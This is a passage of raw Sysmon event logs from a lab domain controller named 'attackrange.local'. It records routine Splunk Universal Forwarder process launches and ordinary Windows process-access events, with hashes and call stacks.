Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001583Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.540{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4299-6000-4300-000000009A01}3992C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001582Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.540{08A6967A-4299-6000-4200-000000009A01}39803984C:\Windows\system32\cmd.exe{08A6967A-4299-6000-4300-000000009A01}3992C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001581Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.542{08A6967A-4299-6000-4300-000000009A01}3992C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe8.0.2splunk Applicationsplunk ApplicationSplunk Inc.splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_argsC:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3{08A6967A-4299-6000-4200-000000009A01}3980C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_args 10341000x80000000000000001580Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.525{08A6967A-4299-6000-4100-000000009A01}39483968C:\Windows\system32\conhost.exe{08A6967A-4299-6000-4200-000000009A01}3980C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001579Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.525{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4299-6000-4200-000000009A01}3980C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001578Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.525{08A6967A-4298-6000-3400-000000009A01}23163944C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4299-6000-4200-000000009A01}3980C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+edcb8|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7d48|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001577Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.536{08A6967A-4299-6000-4200-000000009A01}3980C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_argsC:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{08A6967A-4298-6000-3400-000000009A01}2316C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001576Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.525{08A6967A-4299-6000-4100-000000009A01}39483968C:\Windows\system32\conhost.exe{08A6967A-4298-6000-3400-000000009A01}2316C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001575Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.510{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001574Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.510{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001573Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.510{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001572Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.510{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001571Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.510{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001570Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.510{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001569Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.510{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001568Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.510{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001567Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.510{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001566Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.510{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4299-6000-4100-000000009A01}3948C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001565Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.510{08A6967A-4286-6000-0A00-000000009A01}8441220C:\Windows\system32\services.exe{08A6967A-4298-6000-3400-000000009A01}2316C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001564Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.493{08A6967A-4299-6000-3F00-000000009A01}38883908C:\Windows\system32\conhost.exe{08A6967A-4299-6000-4000-000000009A01}3924C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001563Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.493{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4299-6000-4000-000000009A01}3924C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001562Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.493{08A6967A-4299-6000-3E00-000000009A01}38803884C:\Windows\system32\cmd.exe{08A6967A-4299-6000-4000-000000009A01}3924C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001561Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.484{08A6967A-4299-6000-4000-000000009A01}3924C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe8.0.2splunk Applicationsplunk ApplicationSplunk Inc.splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _RAW_envvarsC:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3{08A6967A-4299-6000-3E00-000000009A01}3880C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _RAW_envvars 10341000x80000000000000001560Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.478{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001559Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.478{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001558Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.478{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001557Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.478{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001556Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.478{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001555Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.478{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001554Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 